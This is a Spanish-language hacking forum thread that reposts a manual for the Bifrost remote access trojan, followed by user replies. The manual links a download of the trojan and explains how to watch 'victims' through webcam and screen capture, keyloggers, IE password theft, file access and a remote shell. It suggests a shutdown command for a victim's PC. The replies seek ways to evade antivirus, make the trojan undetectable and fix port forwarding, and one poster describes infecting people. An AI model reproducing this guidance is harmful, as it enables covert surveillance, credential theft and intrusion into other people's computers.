Manual Bifrost

Started by Anthrax, September 09, 2006, 04:58:13 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Anthrax

el bifrost no tiene mucha complicacion, pero siempre hay gente que no lo sabe manejar, para ello hago este manual.

bajate el bifrost de aqui http://www.trojanfrance.com/index.php?dir=Trojans/Bifrost/&file=Bifrost%20v1.102.rar

Necesitas tener un host de no-ip, si no lo tienes puedes aprender a hacerlo aqui:
http://foro.elhacker.net/index.php/topic,57735.0.html

click para ampliar


despues te llegara una ventana asi (esta ventana debera aparecer siempre q la victima se conecte)


con el nombre de tu victima

con bifrost podras tener a todas tus victimas a la vez conectadas y podras manejarlas todas juntas (algo q en pocos troyanos se puede hacer).



en el bifrost veras muchas columnas:
Assigned Name: nombre que le has puesto a la victima
IP: La ip de la victima
Computer/User Name: Nombre del pc /sesion de la victima
Version: version del troyano
C: la X indica si el usuario tiene web cam
ping: es el ping de la victima, es lo q tarda en responder su pc, si el numero es muy elevado es que la victima se a caido y se desconectara.

click para ampliar


al darle doble clic sobre el nombre de la victima aparecerera una ventana asi:
system info: te da la informacion del pc (version de windows, nombre...)
Unistall,update,reconnect,close server,restar server: son opciones del server como desistalar...
process list: lista de procesos, desde hay le puedes matar el msn y muxas cosas q no te interesa q tng abiertas.
windows list: es la lista de ventanas q tiene abierta en el escritorio.
password list: lista de contraseñas de IE



sobre el nombre de la victima, si pulsamos el boton derecho, veremos un menu asi:
File Manager: es su disco duro, puedes copiar, borrar, subir archivos...
System Manager: es lo mismo q dar doble click sobre el nombre, ya esta explicado arriva
Screen Capture: es para hacer capturas de pantalla, si marcas las casillas keyboard y mouse podras escribirle y clickearle en su pantalla, la barra de abajo a la izquierda regula la calidad de la captura.
Cam Capture: es para hacer capturas de web cam, la barra de abajo a la izquierda regula la calidad de la imagen.
Remote Shell: es la consola de msdos, le das a "Start" y comienza, solo debes poner los comandos que desees (muy usada para apagarle el pc poniendo shutdown -s -t 00).
key logger: al darle a keylogger veras una ventana como esta




Offline Key Logger: sirve para ver lo q a escrito tu victima desde q la infectastes con el troyano, debe estar la pestaña de "Enable offline Key Logger", al darle a "retrieve keys" t bajara todo lo q a escrito, al darle a "clear log" lo borrara.
Online Key Logger: es para ver lo q esta escribiendo la victima en ese mismo instante, activas la casilla de "Enable Online Key Logger" y empiezan a parecer las teclas q marca.


Find Pasword: busca las claves del IE.
Change Name: es para cambiar el nombre de la victima (Assigned Name).
CopY IP: Sirve para copiar la ip de la victima en el portapapeles.

IMPORTANTE:
si tienes un router no te funcionara y deberas abrir el puerto 2000, como cada router es diferente, os recomiendo q llameis a vuestro proveedor de internet y q el os lo explique.

espero q os resulte util.

Escrito por MrCuCo
Fuente: http://foro.elhacker.net/index.php/topic,96853.0.html


PARA LEER LAS REGLAS DEL FORO APRIETA AQUI

::: Lot3k :::

Ke tal anthrax muy buena info , un saludo pongalo en practica

Anthrax

Gracias lot3k, aunque los creditos no van para mi esta vez ;)


PARA LEER LAS REGLAS DEL FORO APRIETA AQUI

SnO.opy

#3
LOLAZO!!!!!!!!

Ese tutorial es de MrCuco de otra pagina de hack....


VA pero bueno minimo pusiste de dodne lo sacaste aunque ese tutorial esta muy bueno nunk ponen como mandarlo y agregarlo(unirlo) a un archivo y asi aprender a mandar el bifrost seguro a tu victima seguro que eso lo ponen a tu criterio...


SnO.opy

Pues si en si entre mas imaginacion tienes y mas astucia te abunda mas opciones tienes y mas modos hay de hackear.. etc.. eso lo dejo a criterio de cada uno pero ese tuto es muy bueno..

VAMPFIRE

Buenas amigos quisiera saber si en el port dejo el 2000 como default o debo colocar el mió?


tatok

 ;D Gracias man, no tenia bien claro eso...  ;)

XtrmKiller




kazin

:O nunca lo habia visto ^^ como se me pudo haber escapado :P.

Quedo lindo

maxmaster

una pregunta para que nos funcionaran el no-ip. bueno nadie dice nada porque y para que es muy facil.

cuando tu le agregas un no-ip al server o troyano y lo envias tu podras entras al moden o router

para que? bueno para k es una estupides yo lo hice una ves y fue en un colegio... esto sirve para poder tranferir los archivos de la pc de la victima a la tuya

josealcuevas

el no-ip sirve para redireccionar a tu ip asi en la makina que estes te redireccionara a esa asi no necesitas una ip estatica...



Komtec1

DreaDy (smile_jamaica)

Como puedo descomprimirlo sin necesidad de desactivar mi antivirus ???
tengo el nod32 instalado , lo reconoce como codigo malicioso y descomprime todo menos el ejecutable, que debo hacer ??


de antemano se agradece .

FELIZ AÑO NUEVO A TODOS, ESPERO QUE ESTE AÑO QUE VIENE SEA EL MEJOR DE SUS VIDAS ;)
" NADIE SABE DE LO QUE ES CAPAZ HASTA QUE LO INETENTA "



SnO.opy

Quote from: smile_jamaica on December 28, 2006, 11:58:53 PM
Como puedo descomprimirlo sin necesidad de desactivar mi antivirus ???
tengo el nod32 instalado , lo reconoce como codigo malicioso y descomprime todo menos el ejecutable, que debo hacer ??


de antemano se agradece .

FELIZ AÑO NUEVO A TODOS, ESPERO QUE ESTE AÑO QUE VIENE SEA EL MEJOR DE SUS VIDAS ;)

Pues con el NoD32 nopo tienes que desavilitarlo si fuera el AVG o el antivir puedes o ponerlo en exepciones o ponerle ignore en el caso del Antivir =)

DreaDy (smile_jamaica)

como abro los puertos, deje el puerto 2000 pero nisiquiera si si esta abierto ....
" NADIE SABE DE LO QUE ES CAPAZ HASTA QUE LO INETENTA "



SnO.opy


SkatE!!

donde puedo descargar el bifrost ??? ???el link ia esta roto me sale error 404!!! donde lo puedo descargaR!!! ??? ???


SkatE!!



SnO.opy

Quote from: SkatE!! on January 05, 2007, 02:18:49 AM
donde puedo descargar el bifrost ??? ???el link ia esta roto me sale error 404!!! donde lo puedo descargaR!!! ??? ???


SkatE!!

www.chasenet.org

=)

kazin

Tambien podes bajartelo en español... aca te dejo el link:

http://hackpr.net/foro/index.php?topic=6072.0


(Es una version anterior)

SergioDS

muy buen tutorial, para inciarse en el bifrost esta muy bien te lo explica todo xd yo vi un video por ahi que me enseño practicamente lo msimo




"Solo Existen 10 tipos de personas, las qe conocen el binario y las que no"

liquid83

hola soy nuevo en el foro y en todo lo ke es de trojanos y eso estoy tratando de hacer un server en bifrost y ya cuando le doy build  me dice q si acepto le pongo aceptar y no lo crea me dice q hubo un error al ro reopen the file ya desisntale mi antivirus q era el q lo detectaba y no lo dejaba abrir nose q hacer para poderlo creaer de antemano gracias por su ayuda.

repc

Hola men bueno yo tmbn soy nuevo en esto kisiera hacer ese server byfrost bueno espero q me salga gracias eh!

bizarry

muy buen manual,asias.
pues ami m gstaria k alguien m pudiese explicar como cambiar la offset para acer el troyano indetectable,se k se necesita un editor hexadecimal de esos lo k no se k numero cambiar ya k lo puedo dejar inservible.
weno acias x adelantao

Giova//w.M

wenazooooooooooo man.. thank por el aporte!

kozifran

Yo tengo un problema con el bifrost,  antes teniendo yo un modem USB  lo usaba, tanto con NoIp  como con mi ip, y no tenia problemas en infectar a la gente, pero ahora teniendo un Router zyzel no me funciona.

he probado a abrir los puertos, el 2020, el 2000,   el 80,  y muchos mas... los abro y se lo pongo  en "port" cuando creo el server, pero lo envio y no sirve... hasta he comprobado con un portatil el activar yo mismo el server (saltandose el antivirus) pero despues en mi casa no detecta a nadie el bifrost...


¿alguien tiene un método para hacerlo funcionar con el Zyzel - Prestige 650HW-31  ?